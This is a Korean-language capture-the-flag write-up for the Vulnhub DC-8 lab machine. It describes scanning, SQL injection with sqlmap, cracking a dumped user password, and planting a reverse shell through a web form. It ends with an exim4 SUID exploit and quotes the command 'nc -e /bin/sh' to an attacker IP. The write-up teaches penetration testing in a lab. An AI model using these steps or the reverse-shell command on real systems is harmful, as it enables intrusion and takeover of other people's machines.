Vulnhub DC : 8

nmap을 이용해 해당 대역을 스캔했는 데 192.168.219.107 80/tcp port가 열려있는 것을 알 수 있다.

그림 8-1 nmap

-A 옵션을 통해 192.168.219.107 열려있는 port를 자세히 확인했다.

그림 8-2 -A 옵션

192.168.219.107 페이지 접속해 페이지를 확인했다.

그림 8-3 DC-8

http://192.168.219.107/?nid=2' 입력 시 SQL Error를 확인할 수 있다.

그림 8-4 SQL Error

sqlmap을 이용해 --dbs(DB 정보) --batch(기본 동작) --risk(위험 정도) --level(테스트 레벨) 옵션을 사용했다.

그림 8-5 sqlmap

d7db, information_schema DB를 확인할 수 있다.

그림 8-6 DataBase

d7db 데이터 베이스를 같은 명령어로 조회했다.

그림 8-7 d7db

users라는 table을 확인할 수 있다.

그림 8-8 tables

users라는 table을 dump를 떴다.

그림 8-9 dump

users라는 table에 admin, john의 계정을 확인할 수 있다.

그림 8-10 계정

john의 계정 passwd를 hash.txt에 저장 후 john the ripper를 이용해 turtle라는 password를 알 수 있다.

그림 8-11 password

디렉터 리스팅 명령어 dirb를 이용해 http://192.168.219.107/user라는 페이지를 확인할 수 있다.

그림 8-12 users

http://192.168.219.107/user/2 페이지 john/turtle 로그인을 하면 접속되는 것을 알 수 있다.

그림 8-13 로그인

Contact Us -> Form settings 페이지 접속해 reverse shell 공격정보를 입력했다.

그림 8-14 reverse shell

Form setting 설정 후 정보를 입력했다.

그림 8-15 Contac Us

reverse shell이 동작 하는 것을 알 수 있다.

그림 8-16 연결성공

SetUID 설정되어 있는 것을 find 명령어를 이용해 검색했는 데 /usr/sbin/exim4가 수상해 보였다.

그림 8-17 SetUID

해당 파일의 버전 정보를 확인할 수 있다.

그림 8-18 Version

 

HTTP Server를 8000 port로 open 했다.

그림 8-19 HTTP Server

https://www.exploit-db.com/exploits/46996 사이트에서 Expolit 코드를 받은 후 dos2unix 명령어를 사용했다.

(텍스트를 처리하면서 Unix(Linux) 환경과 Windows(Dos) 환경의 차이로 인한 오류가 발생하기도 한다. 그중 많이 발생하는 오류가 개행 문자로 인한 오류가 된다.)

그림 8-20 dos2unix

HTTP Server를 통해 exploit 코드 exploit.sh 파일을 다운로드하였다.

그림 8-21 exploit 코드

exploit.sh 파일의 권한을 777로 변경 후 ./exploit.sh -m netcat으로 실행했다.

그림 8-22 exploit.sh

5초 후 nc -e /bin/sh 192.168.219.114 7777 port로 연결을 시도했다.

그림 8-23 netcat

미리 open 한 7777 port에 root 권한으로 접속이 되어 root 폴더에 flag.txt를 확인할 수 있다.

그림 8-24 flag